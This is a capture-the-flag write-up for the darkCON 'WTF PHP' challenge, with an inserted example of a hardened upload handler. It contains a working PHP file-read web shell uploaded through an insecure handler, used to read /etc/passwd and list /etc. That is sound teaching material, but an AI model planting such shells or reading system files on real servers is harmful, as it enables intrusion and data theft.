darkCON CTF: Writeup
Web
WTF PHP
<!--
if(isset($_FILES['fileData'])){
    if($_FILES['fileData']['size'] > 1048576){
        $errors='File size should be less than 1 MB';
    }
    if(empty($errors)==true){
        $uploadedPath = "uploads/".rand().".".explode(".",$_FILES['fileData']['name'])[1];
        move_uploaded_file($_FILES['fileData']['tmp_name'],$uploadedPath);
        echo "File uploaded successfully\n";
        echo '<p><a href='. $uploadedPath .' target="_blank">File</a></p>';
    }else{
        echo $errors;
    }
}
-->
I assumed I could simply upload a PHP file and run OS commands, but the plain system and shell_exec functions cannot be used. After trying various things, the file_get_contents function appears to be usable, so as long as I know where the flag is I can read it.
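The handler above accepts any file name and links straight into a directory the web server executes PHP from, and disabling system and shell_exec does not help because disable_functions is a blocklist, not a sandbox: file_get_contents and scandir still run inside the uploaded script. The following is an added example, not the challenge's own code, of how the same upload handler looks when hardened. The allowlist, the private upload directory and the 1 MB limit are assumptions for illustration.

```php
<?php
// Added example (not the challenge's code): hardened version of the upload handler.
// UPLOAD_DIR and ALLOWED are assumptions for illustration.

const UPLOAD_DIR = __DIR__ . '/../private_uploads'; // assumed: outside the web root
const MAX_BYTES  = 1048576;
// Permitted extensions mapped to the MIME type finfo must report for the content.
const ALLOWED = [
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
    'gif' => 'image/gif',
    'txt' => 'text/plain',
];

function handle_upload(array $file): string
{
    if ($file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed with error code ' . $file['error']);
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('File size should be less than 1 MB');
    }
    // Only trust files PHP itself placed in the temp directory.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }
    // Take the LAST extension, not explode()[1]: "x.jpg.php" must not pass as ".jpg".
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('File type not permitted');
    }
    // Check the content, not just the name: the client controls both name and Content-Type.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('File content does not match its extension');
    }
    // Unpredictable name from the CSPRNG; rand() is guessable and the original
    // reused the client-supplied extension verbatim.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0640); // stored file is never executable
    return $name;
}

if (isset($_FILES['fileData'])) {
    try {
        $stored = handle_upload($_FILES['fileData']);
        // Files are served back through a download script that reads them from
        // UPLOAD_DIR and sets Content-Type, never by linking into a web-served directory.
        echo 'File uploaded successfully: ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```

Even if the upload directory must stay under the web root, the server configuration should turn script execution off for it (for Apache with mod_php, `php_admin_flag engine off` in that directory's vhost block), and open_basedir should confine what the application can read, so a file-read primitive like the one used in this writeup cannot reach /etc.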
<?php echo file_get_contents($_GET['cmd']); ?>
http://wtf-php.darkarmy.xyz/uploads/1050302889.php?cmd=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
Use the scandir function to enumerate the files in the /etc/ directory.
<?php $scan = scandir('/etc/'); print_r($scan); ?>
Array ( [0] => . [1] => .. [2] => .pwd.lock [3] => adduser.conf [4] => alternatives [5] => apache2 [6] => apt [7] => bash.bashrc [8] => bindresvport.blacklist [9] => ca-certificates [10] => ca-certificates.conf [11] => cron.daily [12] => debconf.conf [13] => debian_version [14] => default [15] => deluser.conf [16] => dpkg [17] => emacs [18] => environment [19] => f1@g.txt [20] => fstab [21] => gai.conf [22] => group [23] => group- [24] => gshadow [25] => gss [26] => host.conf [27] => hostname [28] => hosts [29] => init.d [30] => issue [31] => issue.net [32] => kernel [33] => ld.so.cache [34] => ld.so.conf [35] => ld.so.conf.d [36] => ldap [37] => libaudit.conf [38] => localtime [39] => login.defs [40] => logrotate.d [41] => machine-id [42] => magic [43] => magic.mime [44] => mailcap [45] => mailcap.order [46] => mime.types [47] => mke2fs.conf [48] => motd [49] => mtab [50] => nsswitch.conf [51] => opt [52] => os-release [53] => pam.conf [54] => pam.d [55] => passwd [56] => passwd- [57] => perl [58] => profile [59] => profile.d [60] => rc0.d [61] => rc1.d [62] => rc2.d [63] => rc3.d [64] => rc4.d [65] => rc5.d [66] => rc6.d [67] => rcS.d [68] => resolv.conf [69] => rmt [70] => securetty [71] => security [72] => selinux [73] => shadow [74] => shadow- [75] => shells [76] => skel [77] => ssl [78] => staff-group-for-usr-local [79] => subgid [80] => subuid [81] => sysctl.conf [82] => sysctl.d [83] => systemd [84] => terminfo [85] => timezone [86] => update-motd.d )
The f1@g.txt file looks like the flag.
http://wtf-php.darkarmy.xyz/uploads/1050302889.php?cmd=/etc/f1@g.txt
darkCON{us1ng_3_y34r_01d_bug_t0_byp4ss_d1s4ble_funct10n}
flag: darkCON{us1ng_3_y34r_01d_bug_t0_byp4ss_d1s4ble_funct10n}